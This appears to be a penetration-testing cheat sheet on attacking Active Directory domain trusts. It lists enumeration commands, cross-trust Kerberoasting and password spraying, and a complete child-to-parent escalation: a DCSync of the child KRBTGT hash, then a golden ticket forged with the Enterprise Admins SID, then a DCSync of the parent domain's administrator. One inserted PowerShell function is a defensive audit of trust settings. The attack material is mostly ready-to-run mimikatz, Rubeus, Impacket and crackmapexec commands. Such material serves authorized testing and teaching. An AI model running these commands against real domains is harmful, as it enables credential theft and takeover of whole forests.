```powershell
Import-Module ActiveDirectory
Get-ADTrust -Filter *
# Current domain trusts (PowerView)
Get-DomainTrust
# Full trust mapping across all reachable domains (PowerView)
Get-DomainTrustMapping
```
```cmd
netdom query /domain:<DOMAIN> trust
netdom query /domain:<DOMAIN> dc
netdom query /domain:<DOMAIN> workstation
```
BloodHound: use the pre-built query "Map Domain Trusts".
| Property | Meaning |
|---|---|
| Direction | Bidirectional or one-way (Inbound / Outbound) |
| IntraForest | True = parent-child (or other intra-forest) trust within the same forest |
| ForestTransitive | True = forest trust |
| TrustAttributes | Bit flags, e.g. WITHIN_FOREST, FOREST_TRANSITIVE |
| SIDFilteringQuarantined | Whether SID filtering (quarantine) is active |
| TGTDelegation | Whether TGT delegation is allowed across the trust |
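As an added defender-side check (not part of the original cheat sheet), the following PowerShell reads the properties above through Get-ADTrust and flags trusts whose settings widen the effective security boundary. It assumes the RSAT ActiveDirectory module and decodes the TrustAttributes bits TREAT_AS_EXTERNAL (0x40) and CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION (0x800) from MS-ADTS; the Get-TrustRisk function name is mine.

```powershell
Import-Module ActiveDirectory

# TrustAttributes bits (MS-ADTS 6.1.6.7.9)
$TREAT_AS_EXTERNAL     = 0x40   # SID history honoured over a forest trust (netdom /enablesidhistory:yes)
$ENABLE_TGT_DELEGATION = 0x800  # CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION

function Get-TrustRisk {
    [CmdletBinding()]
    param(
        # Trust objects from Get-ADTrust; defaults to every trust of the current domain
        [Parameter(ValueFromPipeline)] $Trust = (Get-ADTrust -Filter *)
    )
    process {
        foreach ($t in $Trust) {
            $findings = @()
            $attrs = [int]$t.TrustAttributes
            if ($t.IntraForest) {
                # SID filtering is never enforced inside a forest, so a child-domain
                # KRBTGT compromise reaches Enterprise Admins: the forest is the boundary.
                $findings += 'intra-forest: SID filtering not possible, forest is the boundary'
            } elseif ($t.ForestTransitive) {
                if ($attrs -band $TREAT_AS_EXTERNAL) {
                    $findings += 'forest trust with SID history enabled (TREAT_AS_EXTERNAL)'
                }
            } elseif (-not $t.SIDFilteringQuarantined) {
                $findings += 'external trust with SID filtering (quarantine) disabled'
            }
            if ($t.TGTDelegation -or ($attrs -band $ENABLE_TGT_DELEGATION)) {
                $findings += 'TGT delegation allowed across the trust'
            }
            if ("$($t.Direction)" -in @('Outbound', 'BiDirectional')) {
                # Our domain trusts the other side, so its principals can authenticate here
                $findings += "accepts principals from $($t.Name)"
            }
            [pscustomobject]@{
                Trust        = $t.Name
                Direction    = $t.Direction
                SIDFiltering = $t.SIDFilteringQuarantined
                Findings     = ($findings -join '; ')
            }
        }
    }
}

Get-TrustRisk | Format-Table -AutoSize -Wrap
```

Run it from a domain-joined host as any authenticated user; an empty Findings column for an external trust means SID filtering and TGT delegation are at their hardened defaults.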
```powershell
# Users in a trusted domain
Get-DomainUser -Domain <TRUSTED_DOMAIN> | select SamAccountName
# Groups in a trusted domain
Get-DomainGroup -Domain <TRUSTED_DOMAIN> | select SamAccountName
# SPNs in a trusted domain (for Kerberoasting)
Get-DomainUser -SPN -Domain <TRUSTED_DOMAIN> | select SamAccountName,serviceprincipalname
# Domain Admins in a trusted domain
Get-DomainGroupMember -Identity "Domain Admins" -Domain <TRUSTED_DOMAIN>
```
```
# Windows (Rubeus)
.\Rubeus.exe kerberoast /domain:<TRUSTED_DOMAIN> /nowrap
# Linux (Impacket)
GetUserSPNs.py -dc-ip <TRUSTED_DC_IP> <TRUSTED_DOMAIN>/<USER>:<PASS> -request
# Password spray against the trusted domain
crackmapexec smb <TRUSTED_DC_IP> -u users.txt -p '<PASSWORD>' -d <TRUSTED_DOMAIN>
```
| Type | Direction | Transitive | SID Filtering |
|---|---|---|---|
| Parent-child | Bidirectional | Yes | No |
| Cross-link | Bidirectional | Yes | No |
| Tree-root | Bidirectional | Yes | No |
| Forest | Varies | Yes | Yes (by default) |
| External | Varies | No | Yes |
```
# 1. KRBTGT hash from child domain
mimikatz # lsadump::dcsync /user:CHILDDOM\krbtgt
# 2. Child domain SID
Get-DomainSID
# 3. Enterprise Admins SID from parent domain
Get-DomainGroup -Domain <PARENT_DOMAIN> -Identity "Enterprise Admins" | select objectsid
# Or: Get-ADGroup -Identity "Enterprise Admins" -Server "<PARENT_DOMAIN>"
```
```
# 4. Forge the ticket with the Enterprise Admins SID in SID history (mimikatz or Rubeus)
mimikatz # kerberos::golden /user:hacker /domain:<CHILD_FQDN> /sid:<CHILD_SID> /krbtgt:<KRBTGT_HASH> /sids:<EA_SID> /ptt
.\Rubeus.exe golden /rc4:<KRBTGT_HASH> /domain:<CHILD_FQDN> /sid:<CHILD_SID> /sids:<EA_SID> /user:hacker /ptt
```
```
# Confirm ticket in memory
klist
# Access parent domain DC
ls \\<PARENT_DC_FQDN>\c$
# DCSync the parent domain
mimikatz # lsadump::dcsync /user:<PARENT>\administrator /domain:<PARENT_FQDN>
```
| Flag | Value |
|---|---|
| /user | Any name (can be fake) |
| /domain | Child domain FQDN |
| /sid | Child domain SID |
| /krbtgt or /rc4 | Child KRBTGT NT hash |
| /sids | Enterprise Admins SID (`<parent-SID>-519`) |
| /ptt | Inject the ticket into the current session |
- Enumerate all trusts with Get-ADTrust or Get-DomainTrust
- Note direction, transitivity, and SID filtering status
- Map the full trust topology with Get-DomainTrustMapping
- Enumerate users, groups, and SPNs across each trusted domain
- Kerberoast / password spray across trusts
- Check whether compromised accounts have admin rights in the target domain
- Visualize with BloodHound
- Document all trusts for the report (clients are often unaware of them)